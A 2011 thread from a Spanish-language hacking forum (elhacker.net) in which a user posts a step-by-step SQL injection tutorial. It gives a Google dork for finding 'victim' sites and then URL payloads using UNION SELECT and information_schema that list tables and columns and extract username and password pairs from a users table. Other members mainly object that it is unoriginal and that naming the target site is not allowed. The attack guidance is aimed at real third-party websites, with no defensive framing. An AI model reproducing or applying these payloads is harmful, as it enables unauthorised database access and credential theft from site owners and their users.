elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:58  


Tema destacado: [Overclocking] Récords de overclock del foro

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  sqli+bug+exploit=videotuto
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: sqli+bug+exploit=videotuto  (Leído 1,080 veces)
ruben_linux

Desconectado Desconectado

Mensajes: 118



Ver Perfil WWW
sqli+bug+exploit=videotuto
« en: 25 Agosto 2011, 23:47 »

Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

 +and+1=0

3.- buscamos union select

Citar

4.- buscamos las tablas

Citar
http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citar
http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citar
   vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

« Última modificación: 26 Agosto 2011, 01:10 por ruben_linux » En línea

Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #1 en: 26 Agosto 2011, 00:18 »

1. No tiene nada de nuevo.
2. No creo que sea necesario ponerle el hosting.
3. ...
En línea

---
‭lipman


Desconectado Desconectado

Mensajes: 2.872



Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #2 en: 26 Agosto 2011, 00:31 »

Interesante.. pero dejame decirte que creo que no está permitido publicar la web vulnerable cuando se hacen este tipo de cosas.

De todos modos, no es que esté muy explicado que digamos =/
En línea

Twitter: jmlipman

http://delanover.com

Busco redactores para mi blog.
WarGhost
I love basket


Desconectado Desconectado

Mensajes: 939



Ver Perfil
Re: sqli+bug+exploit=videotuto
« Respuesta #3 en: 26 Agosto 2011, 02:54 »

A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)
En línea
ruben_linux

Desconectado Desconectado

Mensajes: 118



Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #4 en: 26 Agosto 2011, 13:05 »

A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)

Gracias WarGhost. Ya lo cambie.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
VideoTutorial de Bifrost (simple, mi 1er videotuto)
Análisis y Diseño de Malware
Ozonox 1 392 Último mensaje 1 Agosto 2006, 01:11
por wiz
Videotuto del Softice para Xp
Ingeniería Inversa
bug_over 13 2,742 Último mensaje 5 Julio 2007, 21:52
por nartmidias
[Metasploit] JAVA_basicservice (Videotuto by Metasploiter)
Hacking Avanzado
illera88 3 1,991 Último mensaje 14 Diciembre 2010, 12:56
por l1vv3r
[Videotuto] Exploit local linux 32 y 64 bits « 1 2 3 »
Bugs y Exploits
illera88 35 5,292 Último mensaje 17 Marzo 2011, 23:39
por M3st4ng
[VideoTuto] Instalar VB6 en Win7 x64
Programación Visual Basic
RoX7 1 1,577 Último mensaje 30 Marzo 2011, 20:52
por ntaryl
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines